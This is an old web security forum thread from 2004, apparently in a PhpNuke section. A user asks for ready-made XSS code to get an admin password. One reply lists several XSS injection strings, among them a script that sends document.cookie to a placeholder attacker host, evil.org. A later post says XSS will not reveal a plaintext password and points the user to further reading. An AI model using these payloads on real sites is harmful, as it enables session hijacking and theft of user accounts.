|
|
|
|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 64
Members: 0
Total: 64
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
plz waraxe & all guies |
|
Posted: Fri Jun 04, 2004 3:43 pm |
|
|
condor_4u |
Regular user |
|
|
Joined: Jun 03, 2004 |
Posts: 11 |
|
|
|
|
|
|
|
plz i want a ready xss code that i use it into any exploit to get admin password .....phpnuke for example .....plz...give me aready xss that will work ....
thanx you all... and many thanks for this great forum ....that i learned from it many many things .. |
|
|
|
|
|
Re: plz waraxe & all guies |
|
Posted: Fri Jun 04, 2004 5:12 pm |
|
|
LINUX |
Moderator |
|
|
Joined: May 24, 2004 |
Posts: 404 |
Location: Caiman |
|
|
|
|
|
|
condor_4u wrote: | plz i want a ready xss code that i use it into any exploit to get admin password .....phpnuke for example .....plz...give me aready xss that will work ....
thanx you all... and many thanks for this great forum ....that i learned from it many many things .. |
icenix wrote: | googles the best friend here, once again ...
search for XSS Codes or stuff like that
or make your own...
if the <script> tags arenot blocked then you could parse something like
Code: |
shit'><script>alert(document.cookie)</script>
|
if that gets blocked then you can always retry the same sort of query
which will give you:
Code: |
foobar'><body onload=alert(document.cookie);>
|
or be creative...
Code: |
wateva'><img src="&{alert('CSS Vulnerable')};">
or
f00'><script>document.write('<img src="http://evil.org/'+document.cookie+'") </script>
|
experiment...
i suggest this site
Hope i helped
ice |
|
|
|
|
|
|
thnx alot man |
|
Posted: Fri Jun 04, 2004 7:32 pm |
|
|
condor_4u |
Regular user |
|
|
Joined: Jun 03, 2004 |
Posts: 11 |
|
|
|
|
|
|
|
thnx alot argentino.....many thnx to you |
|
|
|
|
|
...*sigh* |
|
Posted: Sun Jun 06, 2004 10:56 am |
|
|
icenix |
Advanced user |
|
|
Joined: May 13, 2004 |
Posts: 106 |
Location: Australia |
|
|
|
|
|
|
*sigh*
maybe you should read the forum...
and you will deffinatley i garauntee you. that you wont get the plaintext Admin Password throught XSS.
how bout you google more info on XSS before you post these life or death situation requests... |
|
|
|
|
www.waraxe.us Forum Index -> PhpNuke
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|